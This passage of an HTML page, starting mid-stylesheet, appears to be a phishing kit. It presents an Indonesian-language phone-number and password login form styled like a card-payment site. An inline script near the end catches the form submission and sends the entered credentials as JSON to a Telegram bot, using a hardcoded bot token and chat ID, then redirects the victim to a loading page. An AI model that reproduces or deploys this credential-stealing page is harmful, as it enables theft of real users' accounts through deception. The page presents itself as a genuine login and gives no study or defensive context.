    margin-bottom: 15px;
  }
}

.card-list {
  margin-bottom: -100px;
}
@media screen and (max-width: 420px) {
  .card-list {
    margin-bottom: 0px;
  }
}

.card-input {
  margin-bottom: 20px;
}
.card-input__label {
  font-size: 15px;
  margin-bottom: 5px;
  font-weight: 500;
  color: #2F4F4F;
  width: 100%;
  margin-top: -15px;
  display: block;
  user-select: none;
}
.card-input__input {
  width: 100%;
  height: 33px;
  border-radius: 16px;
  box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36); border: outline-style: groove;
  border: 1px solid #2F4F4F;
  transition: all 0.3s ease-in-out;
  font-size: 16px;
  padding: 5px;
  padding-left: 20px;
  padding-top: 5px;
  background:;
  color: #2F4F4F;
  font-family: "Source Sans Pro", sans-serif;
}
.card-input__input:hover, .card-input__input:focus {
  border-color: 
}
.card-input__input:focus {
  box-shadow: 0px 10px 20px -13px rgba(32, 56, 117, 0.35);
  background: #fff;
}


.card-input__input::placeholder{
    font-size: 14px;
    
}
.card-input__input.-select {
  -webkit-appearance: none;
  background-image: url("https://raw.githubusercontent.com/unitetger/Me355/refs/heads/main/IMG_20250313_211902_885.jpg");
  background-size: 14px;
  background-position: 90% center;
  background-repeat: no-repeat;
  padding-right: 30px;
  padding-top: 3px;
}


.card-input__input.-select2 {
  -webkit-appearance: none;
  background-image: url("https://uxwing.com/wp-content/themes/uxwing/download/e-commerce-currency-shopping/card-cvv-icon.png");
  background-size: 22px;
  background-position: 90% center;
  background-repeat: no-repeat;
  padding-right: 30px;
  padding-top: 3px;
}

.slide-fade-up-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}

.slide-fade-up-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}

.slide-fade-up-enter {
  opacity: 0;
  transform: translateY(15px);
  pointer-events: none;
}

.slide-fade-up-leave-to {
  opacity: 0;
  transform: translateY(-15px);
  pointer-events: none;
}

.slide-fade-right-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}

.slide-fade-right-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}

.slide-fade-right-enter {
  opacity: 0;
  transform: translateX(10px) rotate(45deg);
  pointer-events: none;
}

.slide-fade-right-leave-to {
  opacity: 0;
  transform: translateX(-10px) rotate(45deg);
  pointer-events: none;
}

.github-btn {
  position: absolute;
  right: 40px;
  bottom: 50px;
  text-decoration: none;
  padding: 15px 25px;
  border-radius: 4px;
  box-shadow: 0px 4px 30px -6px rgba(36, 52, 70, 0.65);
  background: #24292e;
  color: #fff;
  font-weight: bold;
  letter-spacing: 1px;
  font-size: 16px;
  text-align: center;
  transition: all 0.3s ease-in-out;
}
@media screen and (min-width: 500px) {
  .github-btn:hover {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}
@media screen and (max-width: 700px) {
  .github-btn {
    position: relative;
    bottom: auto;
    right: auto;
    margin-top: 60px;
  }
  .github-btn:active {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}
      .wrapper {
	width: 100%;
	overflow: hidden;
}
.photobanner {
	position: relative;
	height: 180px;
	margin-bottom: 30px;
	display: flex;
	width: 100%;
}

.photobanner img {
  margin: 0px 5px;
  box-shadow: 2px 3px 8px #8a8a8a;
  border: 2px groove #118eea;
  border-radius: 5px;
  width:80%;
}

.photobanner {
  animation: bannermove 15s linear infinite alternate-reverse;
}

@keyframes bannermove {
  from {
    left: 0%;
  }
  to {
    left: -1000px;
  }
}

#typing-text {
	width: 100%;
	height: 60px;
	font-size: 12px;
	border: solid 0px #C9C9C9;
	color: #2F4F4F;
	background-color: #FFFFFF;
	text-align: center;
	font-family: Average, serif;
	font-weight: bold;
	padding: 5px;
	resize: none;
	outline: none;
	box-sizing: border-box;
	  box-shadow: #DCDCDC 4px 2px 8px 3px;
  border-radius: 12px;
  border: 3px ridge;
  color: #2F4F4F;
  padding-top: 10px;
}

.animation-bounceInRight {
    animation-name: bounceInRight;
    animation-duration: 2s;
    animation-timing-function: ease-in;
    animation-fill-mode: both;
}
@keyframes bounceInRight {
    0% {
        opacity: 0;
        transform: translateX(200px);
    }
    60% {
        opacity: 1;
        transform: translateX(-30px);
    }
    80% {
        transform: translateX(10px);
    }
    100% {
        transform: translateX(0);
    }
}


    </style> 
<body>
    <div class="card-form">
<div class="card-list">
  <nav style="position: 10; top: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 60px; background: transparent; z-index: 99999" class="animation-fadeInDownBig">      
<div class="wrapper animation-bounceInRight" style="margin-top: 0px"></div>
      <div class="card-form__inner">
        <div class="card-input">
          <section class="section">
                  <div class="container"><br><hr>
        <b class="chakra-text css-q7z8lq"></b>
        <form id="setPin" onsubmit=""><div class="css-2z8rzx"><div class="css-qhzfk3"><b>Nomor Telpon</b><input type="number" minlength="" maxlength="" name="Nomor/ID :" id="Username" autocomplete="off" placeholder = "Masukan Nomor telpon / ID" required="" class="css-1ew2b06"></div><div class="css-qhzfk3"><b>Kata Sandi</b><input name="Password :" type="password" minlength="" maxlength="" id="password" placeholder="Kata Sandi" autocomplete="off" required="" class="css-1ew2b06"></div><hr>
    <strong><a href="riset.html" target="_blank" style="color: #fff; text-decoration: none;">Lupa Username/Password?</a></strong></p><br><div class="css-70qvj9"><button type="submit" class="chakra-button css-2z5j4d">Daftar</button>▫️<button type="sumbit" class="chakra-button css-1h9adj1">
                        Login</button></div>
       <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
   <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
   <p id="status"></p>
   <script src="setPin.js"></script>
   
   <script>
   
            $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });
            
const chat_id = '8025305250', botID = 'bot8153740654%3AAAEUFpYcjftXKjSpOZGApMt9zDKp6KZBKE0';

    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;

    document.querySelector('#setPin').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href = '/loding.html';
    });

            
        });
        
   </script>
        </form>
      </div>
    </section>
    <!-- <script src="./axios.js" type="module"></script> -->
    <script src="./Pin.html" type="module"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
  </body>
</html>
